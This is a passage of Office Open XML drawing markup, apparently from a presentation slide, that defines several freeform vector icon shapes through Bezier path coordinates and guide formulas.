                      <a:pt x="16" y="7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0" y="72"/>
                      <a:pt x="2" y="76"/>
                      <a:pt x="6" y="77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43" y="86"/>
                      <a:pt x="47" y="84"/>
                      <a:pt x="48" y="80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4" y="14"/>
                      <a:pt x="61" y="10"/>
                      <a:pt x="58" y="9"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="31" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="11"/>
                      <a:pt x="50" y="11"/>
                      <a:pt x="50" y="11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30" y="9"/>
                      <a:pt x="30" y="9"/>
                      <a:pt x="30" y="9"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="24" y="76"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="76"/>
                      <a:pt x="19" y="73"/>
                      <a:pt x="20" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="68"/>
                      <a:pt x="23" y="66"/>
                      <a:pt x="26" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="68"/>
                      <a:pt x="30" y="70"/>
                      <a:pt x="30" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="75"/>
                      <a:pt x="26" y="77"/>
                      <a:pt x="24" y="76"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="46" y="67"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="58"/>
                      <a:pt x="8" y="58"/>
                      <a:pt x="8" y="58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46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0" name="Freeform 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDAD9C87-C0C2-45C5-8E05-A5D47CC8B1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70099" y="3638300"/>
                <a:ext cx="274026" cy="207477"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 86"/>
                  <a:gd name="T1" fmla="*/ 11 h 65"/>
                  <a:gd name="T2" fmla="*/ 75 w 86"/>
                  <a:gd name="T3" fmla="*/ 0 h 65"/>
                  <a:gd name="T4" fmla="*/ 0 w 86"/>
                  <a:gd name="T5" fmla="*/ 0 h 65"/>
                  <a:gd name="T6" fmla="*/ 0 w 86"/>
                  <a:gd name="T7" fmla="*/ 60 h 65"/>
                  <a:gd name="T8" fmla="*/ 5 w 86"/>
                  <a:gd name="T9" fmla="*/ 65 h 65"/>
                  <a:gd name="T10" fmla="*/ 78 w 86"/>
                  <a:gd name="T11" fmla="*/ 65 h 65"/>
                  <a:gd name="T12" fmla="*/ 86 w 86"/>
                  <a:gd name="T13" fmla="*/ 57 h 65"/>
                  <a:gd name="T14" fmla="*/ 86 w 86"/>
                  <a:gd name="T15" fmla="*/ 11 h 65"/>
                  <a:gd name="T16" fmla="*/ 75 w 86"/>
                  <a:gd name="T17" fmla="*/ 11 h 65"/>
                  <a:gd name="T18" fmla="*/ 70 w 86"/>
                  <a:gd name="T19" fmla="*/ 60 h 65"/>
                  <a:gd name="T20" fmla="*/ 5 w 86"/>
                  <a:gd name="T21" fmla="*/ 60 h 65"/>
                  <a:gd name="T22" fmla="*/ 5 w 86"/>
                  <a:gd name="T23" fmla="*/ 5 h 65"/>
                  <a:gd name="T24" fmla="*/ 70 w 86"/>
                  <a:gd name="T25" fmla="*/ 5 h 65"/>
                  <a:gd name="T26" fmla="*/ 70 w 86"/>
                  <a:gd name="T27" fmla="*/ 60 h 65"/>
                  <a:gd name="T28" fmla="*/ 10 w 86"/>
                  <a:gd name="T29" fmla="*/ 16 h 65"/>
                  <a:gd name="T30" fmla="*/ 64 w 86"/>
                  <a:gd name="T31" fmla="*/ 16 h 65"/>
                  <a:gd name="T32" fmla="*/ 64 w 86"/>
                  <a:gd name="T33" fmla="*/ 22 h 65"/>
                  <a:gd name="T34" fmla="*/ 10 w 86"/>
                  <a:gd name="T35" fmla="*/ 22 h 65"/>
                  <a:gd name="T36" fmla="*/ 10 w 86"/>
                  <a:gd name="T37" fmla="*/ 16 h 65"/>
                  <a:gd name="T38" fmla="*/ 43 w 86"/>
                  <a:gd name="T39" fmla="*/ 27 h 65"/>
                  <a:gd name="T40" fmla="*/ 64 w 86"/>
                  <a:gd name="T41" fmla="*/ 27 h 65"/>
                  <a:gd name="T42" fmla="*/ 64 w 86"/>
                  <a:gd name="T43" fmla="*/ 32 h 65"/>
                  <a:gd name="T44" fmla="*/ 43 w 86"/>
                  <a:gd name="T45" fmla="*/ 32 h 65"/>
                  <a:gd name="T46" fmla="*/ 43 w 86"/>
                  <a:gd name="T47" fmla="*/ 27 h 65"/>
                  <a:gd name="T48" fmla="*/ 43 w 86"/>
                  <a:gd name="T49" fmla="*/ 38 h 65"/>
                  <a:gd name="T50" fmla="*/ 64 w 86"/>
                  <a:gd name="T51" fmla="*/ 38 h 65"/>
                  <a:gd name="T52" fmla="*/ 64 w 86"/>
                  <a:gd name="T53" fmla="*/ 43 h 65"/>
                  <a:gd name="T54" fmla="*/ 43 w 86"/>
                  <a:gd name="T55" fmla="*/ 43 h 65"/>
                  <a:gd name="T56" fmla="*/ 43 w 86"/>
                  <a:gd name="T57" fmla="*/ 38 h 65"/>
                  <a:gd name="T58" fmla="*/ 43 w 86"/>
                  <a:gd name="T59" fmla="*/ 49 h 65"/>
                  <a:gd name="T60" fmla="*/ 59 w 86"/>
                  <a:gd name="T61" fmla="*/ 49 h 65"/>
                  <a:gd name="T62" fmla="*/ 59 w 86"/>
                  <a:gd name="T63" fmla="*/ 54 h 65"/>
                  <a:gd name="T64" fmla="*/ 43 w 86"/>
                  <a:gd name="T65" fmla="*/ 54 h 65"/>
                  <a:gd name="T66" fmla="*/ 43 w 86"/>
                  <a:gd name="T67" fmla="*/ 49 h 65"/>
                  <a:gd name="T68" fmla="*/ 10 w 86"/>
                  <a:gd name="T69" fmla="*/ 27 h 65"/>
                  <a:gd name="T70" fmla="*/ 37 w 86"/>
                  <a:gd name="T71" fmla="*/ 27 h 65"/>
                  <a:gd name="T72" fmla="*/ 37 w 86"/>
                  <a:gd name="T73" fmla="*/ 54 h 65"/>
                  <a:gd name="T74" fmla="*/ 10 w 86"/>
                  <a:gd name="T75" fmla="*/ 54 h 65"/>
                  <a:gd name="T76" fmla="*/ 10 w 86"/>
                  <a:gd name="T77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65">
                    <a:moveTo>
                      <a:pt x="75" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="0"/>
                      <a:pt x="75" y="0"/>
                      <a:pt x="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2"/>
                      <a:pt x="2" y="65"/>
                      <a:pt x="5" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="65"/>
                      <a:pt x="78" y="65"/>
                      <a:pt x="78" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="65"/>
                      <a:pt x="86" y="61"/>
                      <a:pt x="86" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="11"/>
                      <a:pt x="86" y="11"/>
                      <a:pt x="86" y="11"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="75" y="11"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="70" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="60"/>
                      <a:pt x="5" y="60"/>
                      <a:pt x="5" y="60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0" y="5"/>
                      <a:pt x="70" y="5"/>
                      <a:pt x="70" y="5"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="70" y="60"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10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10" y="22"/>
                      <a:pt x="10" y="22"/>
                      <a:pt x="10" y="22"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="27"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="27"/>
                      <a:pt x="64" y="27"/>
                      <a:pt x="64" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="32"/>
                      <a:pt x="64" y="32"/>
                      <a:pt x="64" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="32"/>
                      <a:pt x="43" y="32"/>
                      <a:pt x="43" y="32"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="43" y="27"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="38"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="38"/>
                      <a:pt x="64" y="38"/>
                      <a:pt x="64" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="43"/>
                      <a:pt x="64" y="43"/>
                      <a:pt x="64" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="43"/>
                      <a:pt x="43" y="43"/>
                      <a:pt x="43" y="43"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="43" y="38"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="49"/>
                      <a:pt x="59" y="49"/>
                      <a:pt x="59" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="54"/>
                      <a:pt x="59" y="54"/>
                      <a:pt x="59" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="54"/>
                      <a:pt x="43" y="54"/>
                      <a:pt x="43" y="54"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="43" y="49"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10" y="27"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="27"/>
                      <a:pt x="37" y="27"/>
                      <a:pt x="37" y="27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10" y="54"/>
                      <a:pt x="10" y="54"/>
                      <a:pt x="10" y="54"/>
                    </a:cubicBez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1" name="Freeform 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDAF840-87B9-44C1-8DCD-F293664B94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63698" y="2767289"/>
                <a:ext cx="256411" cy="256409"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 131"/>
                  <a:gd name="T1" fmla="*/ 131 h 131"/>
                  <a:gd name="T2" fmla="*/ 65 w 131"/>
                  <a:gd name="T3" fmla="*/ 131 h 131"/>
                  <a:gd name="T4" fmla="*/ 65 w 131"/>
                  <a:gd name="T5" fmla="*/ 0 h 131"/>
                  <a:gd name="T6" fmla="*/ 0 w 131"/>
                  <a:gd name="T7" fmla="*/ 0 h 131"/>
                  <a:gd name="T8" fmla="*/ 0 w 131"/>
                  <a:gd name="T9" fmla="*/ 131 h 131"/>
                  <a:gd name="T10" fmla="*/ 41 w 131"/>
                  <a:gd name="T11" fmla="*/ 17 h 131"/>
                  <a:gd name="T12" fmla="*/ 57 w 131"/>
                  <a:gd name="T13" fmla="*/ 17 h 131"/>
                  <a:gd name="T14" fmla="*/ 57 w 131"/>
                  <a:gd name="T15" fmla="*/ 33 h 131"/>
                  <a:gd name="T16" fmla="*/ 41 w 131"/>
                  <a:gd name="T17" fmla="*/ 33 h 131"/>
                  <a:gd name="T18" fmla="*/ 41 w 131"/>
                  <a:gd name="T19" fmla="*/ 17 h 131"/>
                  <a:gd name="T20" fmla="*/ 41 w 131"/>
                  <a:gd name="T21" fmla="*/ 49 h 131"/>
                  <a:gd name="T22" fmla="*/ 57 w 131"/>
                  <a:gd name="T23" fmla="*/ 49 h 131"/>
                  <a:gd name="T24" fmla="*/ 57 w 131"/>
                  <a:gd name="T25" fmla="*/ 66 h 131"/>
                  <a:gd name="T26" fmla="*/ 41 w 131"/>
                  <a:gd name="T27" fmla="*/ 66 h 131"/>
                  <a:gd name="T28" fmla="*/ 41 w 131"/>
                  <a:gd name="T29" fmla="*/ 49 h 131"/>
                  <a:gd name="T30" fmla="*/ 41 w 131"/>
                  <a:gd name="T31" fmla="*/ 82 h 131"/>
                  <a:gd name="T32" fmla="*/ 57 w 131"/>
                  <a:gd name="T33" fmla="*/ 82 h 131"/>
                  <a:gd name="T34" fmla="*/ 57 w 131"/>
                  <a:gd name="T35" fmla="*/ 98 h 131"/>
                  <a:gd name="T36" fmla="*/ 41 w 131"/>
                  <a:gd name="T37" fmla="*/ 98 h 131"/>
                  <a:gd name="T38" fmla="*/ 41 w 131"/>
                  <a:gd name="T39" fmla="*/ 82 h 131"/>
                  <a:gd name="T40" fmla="*/ 8 w 131"/>
                  <a:gd name="T41" fmla="*/ 17 h 131"/>
                  <a:gd name="T42" fmla="*/ 24 w 131"/>
                  <a:gd name="T43" fmla="*/ 17 h 131"/>
                  <a:gd name="T44" fmla="*/ 24 w 131"/>
                  <a:gd name="T45" fmla="*/ 33 h 131"/>
                  <a:gd name="T46" fmla="*/ 8 w 131"/>
                  <a:gd name="T47" fmla="*/ 33 h 131"/>
                  <a:gd name="T48" fmla="*/ 8 w 131"/>
                  <a:gd name="T49" fmla="*/ 17 h 131"/>
                  <a:gd name="T50" fmla="*/ 8 w 131"/>
                  <a:gd name="T51" fmla="*/ 49 h 131"/>
                  <a:gd name="T52" fmla="*/ 24 w 131"/>
                  <a:gd name="T53" fmla="*/ 49 h 131"/>
                  <a:gd name="T54" fmla="*/ 24 w 131"/>
                  <a:gd name="T55" fmla="*/ 66 h 131"/>
                  <a:gd name="T56" fmla="*/ 8 w 131"/>
                  <a:gd name="T57" fmla="*/ 66 h 131"/>
                  <a:gd name="T58" fmla="*/ 8 w 131"/>
                  <a:gd name="T59" fmla="*/ 49 h 131"/>
                  <a:gd name="T60" fmla="*/ 8 w 131"/>
                  <a:gd name="T61" fmla="*/ 82 h 131"/>
                  <a:gd name="T62" fmla="*/ 24 w 131"/>
                  <a:gd name="T63" fmla="*/ 82 h 131"/>
                  <a:gd name="T64" fmla="*/ 24 w 131"/>
                  <a:gd name="T65" fmla="*/ 98 h 131"/>
                  <a:gd name="T66" fmla="*/ 8 w 131"/>
                  <a:gd name="T67" fmla="*/ 98 h 131"/>
                  <a:gd name="T68" fmla="*/ 8 w 131"/>
                  <a:gd name="T69" fmla="*/ 82 h 131"/>
                  <a:gd name="T70" fmla="*/ 73 w 131"/>
                  <a:gd name="T71" fmla="*/ 41 h 131"/>
                  <a:gd name="T72" fmla="*/ 131 w 131"/>
                  <a:gd name="T73" fmla="*/ 41 h 131"/>
                  <a:gd name="T74" fmla="*/ 131 w 131"/>
                  <a:gd name="T75" fmla="*/ 49 h 131"/>
                  <a:gd name="T76" fmla="*/ 73 w 131"/>
                  <a:gd name="T77" fmla="*/ 49 h 131"/>
                  <a:gd name="T78" fmla="*/ 73 w 131"/>
                  <a:gd name="T79" fmla="*/ 41 h 131"/>
                  <a:gd name="T80" fmla="*/ 73 w 131"/>
                  <a:gd name="T81" fmla="*/ 131 h 131"/>
                  <a:gd name="T82" fmla="*/ 90 w 131"/>
                  <a:gd name="T83" fmla="*/ 131 h 131"/>
                  <a:gd name="T84" fmla="*/ 90 w 131"/>
                  <a:gd name="T85" fmla="*/ 98 h 131"/>
                  <a:gd name="T86" fmla="*/ 114 w 131"/>
                  <a:gd name="T87" fmla="*/ 98 h 131"/>
                  <a:gd name="T88" fmla="*/ 114 w 131"/>
                  <a:gd name="T89" fmla="*/ 131 h 131"/>
                  <a:gd name="T90" fmla="*/ 131 w 131"/>
                  <a:gd name="T91" fmla="*/ 131 h 131"/>
                  <a:gd name="T92" fmla="*/ 131 w 131"/>
                  <a:gd name="T93" fmla="*/ 57 h 131"/>
                  <a:gd name="T94" fmla="*/ 73 w 131"/>
                  <a:gd name="T95" fmla="*/ 57 h 131"/>
                  <a:gd name="T96" fmla="*/ 73 w 131"/>
                  <a:gd name="T97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1" h="131">
                    <a:moveTo>
                      <a:pt x="0" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="65" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="131"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="17"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="49"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="49"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="82"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="82"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="17"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="49"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="49"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="82"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="82"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="41"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="131" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="41"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="90" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73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2" name="Freeform 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9080AF98-C797-45F1-893B-86E85CC33B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12808" y="3080462"/>
                <a:ext cx="272069" cy="272068"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 79 w 85"/>
                  <a:gd name="T1" fmla="*/ 24 h 85"/>
                  <a:gd name="T2" fmla="*/ 61 w 85"/>
                  <a:gd name="T3" fmla="*/ 6 h 85"/>
                  <a:gd name="T4" fmla="*/ 66 w 85"/>
                  <a:gd name="T5" fmla="*/ 0 h 85"/>
                  <a:gd name="T6" fmla="*/ 85 w 85"/>
                  <a:gd name="T7" fmla="*/ 19 h 85"/>
                  <a:gd name="T8" fmla="*/ 79 w 85"/>
                  <a:gd name="T9" fmla="*/ 24 h 85"/>
                  <a:gd name="T10" fmla="*/ 74 w 85"/>
                  <a:gd name="T11" fmla="*/ 30 h 85"/>
                  <a:gd name="T12" fmla="*/ 71 w 85"/>
                  <a:gd name="T13" fmla="*/ 59 h 85"/>
                  <a:gd name="T14" fmla="*/ 13 w 85"/>
                  <a:gd name="T15" fmla="*/ 85 h 85"/>
                  <a:gd name="T16" fmla="*/ 8 w 85"/>
                  <a:gd name="T17" fmla="*/ 81 h 85"/>
                  <a:gd name="T18" fmla="*/ 31 w 85"/>
                  <a:gd name="T19" fmla="*/ 58 h 85"/>
                  <a:gd name="T20" fmla="*/ 34 w 85"/>
                  <a:gd name="T21" fmla="*/ 59 h 85"/>
                  <a:gd name="T22" fmla="*/ 42 w 85"/>
                  <a:gd name="T23" fmla="*/ 51 h 85"/>
                  <a:gd name="T24" fmla="*/ 34 w 85"/>
                  <a:gd name="T25" fmla="*/ 43 h 85"/>
                  <a:gd name="T26" fmla="*/ 26 w 85"/>
                  <a:gd name="T27" fmla="*/ 51 h 85"/>
                  <a:gd name="T28" fmla="*/ 27 w 85"/>
                  <a:gd name="T29" fmla="*/ 54 h 85"/>
                  <a:gd name="T30" fmla="*/ 4 w 85"/>
                  <a:gd name="T31" fmla="*/ 76 h 85"/>
                  <a:gd name="T32" fmla="*/ 0 w 85"/>
                  <a:gd name="T33" fmla="*/ 72 h 85"/>
                  <a:gd name="T34" fmla="*/ 26 w 85"/>
                  <a:gd name="T35" fmla="*/ 14 h 85"/>
                  <a:gd name="T36" fmla="*/ 55 w 85"/>
                  <a:gd name="T37" fmla="*/ 11 h 85"/>
                  <a:gd name="T38" fmla="*/ 74 w 85"/>
                  <a:gd name="T39" fmla="*/ 3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85">
                    <a:moveTo>
                      <a:pt x="79" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="6"/>
                      <a:pt x="61" y="6"/>
                      <a:pt x="61" y="6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85" y="19"/>
                      <a:pt x="85" y="19"/>
                      <a:pt x="85" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="79" y="24"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="74" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="59"/>
                      <a:pt x="71" y="59"/>
                      <a:pt x="71" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="59"/>
                      <a:pt x="13" y="85"/>
                      <a:pt x="13" y="85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2" y="59"/>
                      <a:pt x="33" y="59"/>
                      <a:pt x="34" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="59"/>
                      <a:pt x="42" y="55"/>
                      <a:pt x="42" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="46"/>
                      <a:pt x="38" y="43"/>
                      <a:pt x="34" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="43"/>
                      <a:pt x="26" y="46"/>
                      <a:pt x="26" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="52"/>
                      <a:pt x="26" y="53"/>
                      <a:pt x="27" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="76"/>
                      <a:pt x="4" y="76"/>
                      <a:pt x="4" y="76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2"/>
                      <a:pt x="26" y="37"/>
                      <a:pt x="26" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="11"/>
                      <a:pt x="55" y="11"/>
                      <a:pt x="55" y="11"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="74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3" name="Freeform 108">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A4E18B5-EF43-4E2D-A54B-03DB4A9A5F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66184" y="2757502"/>
                <a:ext cx="246623" cy="246623"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 77"/>
                  <a:gd name="T1" fmla="*/ 30 h 77"/>
                  <a:gd name="T2" fmla="*/ 26 w 77"/>
                  <a:gd name="T3" fmla="*/ 2 h 77"/>
                  <a:gd name="T4" fmla="*/ 39 w 77"/>
                  <a:gd name="T5" fmla="*/ 0 h 77"/>
                  <a:gd name="T6" fmla="*/ 53 w 77"/>
                  <a:gd name="T7" fmla="*/ 3 h 77"/>
                  <a:gd name="T8" fmla="*/ 53 w 77"/>
                  <a:gd name="T9" fmla="*/ 30 h 77"/>
                  <a:gd name="T10" fmla="*/ 58 w 77"/>
                  <a:gd name="T11" fmla="*/ 53 h 77"/>
                  <a:gd name="T12" fmla="*/ 58 w 77"/>
                  <a:gd name="T13" fmla="*/ 5 h 77"/>
                  <a:gd name="T14" fmla="*/ 77 w 77"/>
                  <a:gd name="T15" fmla="*/ 38 h 77"/>
                  <a:gd name="T16" fmla="*/ 74 w 77"/>
                  <a:gd name="T17" fmla="*/ 53 h 77"/>
                  <a:gd name="T18" fmla="*/ 58 w 77"/>
                  <a:gd name="T19" fmla="*/ 53 h 77"/>
                  <a:gd name="T20" fmla="*/ 24 w 77"/>
                  <a:gd name="T21" fmla="*/ 58 h 77"/>
                  <a:gd name="T22" fmla="*/ 72 w 77"/>
                  <a:gd name="T23" fmla="*/ 58 h 77"/>
                  <a:gd name="T24" fmla="*/ 39 w 77"/>
                  <a:gd name="T25" fmla="*/ 77 h 77"/>
                  <a:gd name="T26" fmla="*/ 24 w 77"/>
                  <a:gd name="T27" fmla="*/ 74 h 77"/>
                  <a:gd name="T28" fmla="*/ 24 w 77"/>
                  <a:gd name="T29" fmla="*/ 58 h 77"/>
                  <a:gd name="T30" fmla="*/ 32 w 77"/>
                  <a:gd name="T31" fmla="*/ 17 h 77"/>
                  <a:gd name="T32" fmla="*/ 1 w 77"/>
                  <a:gd name="T33" fmla="*/ 48 h 77"/>
                  <a:gd name="T34" fmla="*/ 0 w 77"/>
                  <a:gd name="T35" fmla="*/ 38 h 77"/>
                  <a:gd name="T36" fmla="*/ 20 w 77"/>
                  <a:gd name="T37" fmla="*/ 5 h 77"/>
                  <a:gd name="T38" fmla="*/ 32 w 77"/>
                  <a:gd name="T39" fmla="*/ 17 h 77"/>
                  <a:gd name="T40" fmla="*/ 20 w 77"/>
                  <a:gd name="T41" fmla="*/ 38 h 77"/>
                  <a:gd name="T42" fmla="*/ 20 w 77"/>
                  <a:gd name="T43" fmla="*/ 72 h 77"/>
                  <a:gd name="T44" fmla="*/ 4 w 77"/>
                  <a:gd name="T45" fmla="*/ 54 h 77"/>
                  <a:gd name="T46" fmla="*/ 20 w 77"/>
                  <a:gd name="T4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77">
                    <a:moveTo>
                      <a:pt x="53" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="2"/>
                      <a:pt x="26" y="2"/>
                      <a:pt x="26" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="1"/>
                      <a:pt x="34" y="0"/>
                      <a:pt x="39" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="0"/>
                      <a:pt x="49" y="1"/>
                      <a:pt x="53" y="3"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="53" y="30"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="58" y="53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69" y="12"/>
                      <a:pt x="77" y="24"/>
                      <a:pt x="77" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="43"/>
                      <a:pt x="76" y="48"/>
                      <a:pt x="74" y="53"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="58" y="53"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="24" y="58"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="58"/>
                      <a:pt x="72" y="58"/>
                      <a:pt x="72" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
